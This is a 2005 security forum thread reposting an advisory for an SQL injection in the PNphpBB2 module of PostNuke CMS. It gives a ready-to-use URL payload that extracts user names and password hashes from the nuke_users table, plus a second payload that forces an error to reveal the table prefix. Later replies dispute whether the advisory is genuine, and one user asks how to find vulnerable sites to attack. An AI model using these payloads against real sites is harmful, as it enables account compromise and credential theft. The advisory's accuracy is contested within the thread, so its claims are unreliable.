 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Postnuke all versions + pnphpbb <=1.2 sql injection |
 |
 Posted: Wed Mar 02, 2005 2:23 pm |
 |
|
| LINUX |
| Moderator |
 |
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
 |
|
 |
|
1. -----------introduction--------.
Postnuke is an open source CMS (content management system), originally based in php-nuke. (www.postnuke.com)
pnphpbb is a module for postnuke based in popular forum system phpbb. (www.phpbb.com)
2. ------------the bug------------
in 26 -03-04 janek vind discovers a bug in phpbb forums, in prvmsg.php file described in the bugtraq id 9984 and the bug affects also to php-nuke; butraq privades exploits for exploit this bug in php-nuke and phpbb.
But the module Pnphpbb (postnuke phpbb) is also vulnerable to this issue, and its easy to exploit:
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here]
3 -------- the exploit ----------
Working exploit:
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*
Show password hash for the user with uid = 2.
4. ------important notes-----
Note: if don't works, changue the prefix nuke_ for the valid prefix, you can get the valid table prefix causing an error like this:
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20'
5----- Contact -----
Author: Jocanor
Location: Spain
Email: jocanor [at] gmail [dot] com
JoCaNoR SeCuRiTy ReaSoNS
EOF. |
|
|
|
|
|
|
|
|
| Posted: Thu Mar 03, 2005 10:59 am |
|
|
| sp3x |
| Valuable expert |
 |
|
| Joined: Feb 15, 2005 |
| Posts: 10 |
|
|
|
|
|
|
|
old bug....
this adv is false....
New bugs about postnuke .... critical bugs with full disclose where realised... and described on www.securityreason.com |
|
|
|
|
| Posted: Thu Mar 03, 2005 5:37 pm |
|
|
| Dora |
| Regular user |
|
|
| Joined: Dec 21, 2004 |
| Posts: 10 |
|
|
|
|
|
|
|
I search */index.php?name=PNphpBB2 at altavista any file many site but your exploit may be not word . 
Pls tell me more detail about this bug
Thank |
|
|
|
|
| Posted: Fri Mar 04, 2005 6:26 am |
|
|
| HaCkZataN |
| Regular user |
|
|
| Joined: Feb 23, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
| yeah that adv is a fake jajajja that guy is crazy lol jocanor has already post 2 fake advisores this one and there is another jajajja |
|
|
|
|
| Posted: Fri Mar 04, 2005 12:20 pm |
|
|
| Zeelock |
| Active user |
 |
|
| Joined: Jan 27, 2005 |
| Posts: 29 |
| Location: Where stars come out at night |
|
|
|
|
|
|
| It's a bug in old Phpbb. Of course if you use old phpbb versions... |
|
_________________
If it seems to be impossible, just step up your level! |
|
|
|
| Posted: Fri Mar 04, 2005 3:38 pm |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| HaCkZataN wrote: | | yeah that adv is a fake jajajja that guy is crazy lol jocanor has already post 2 fake advisores this one and there is another jajajja |
mmmm faker vs faker hahah GCC root fake heheh >gcc -shared -o /tmp/nst.nfo /tmp/nst.c;rm -f /tmp/nst.c
jonakor is the best faker in the world mmm you know other fake xD |
|
|
|
|
www.waraxe.us Forum Index -> PostNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 231
Members: 0
Total: 231
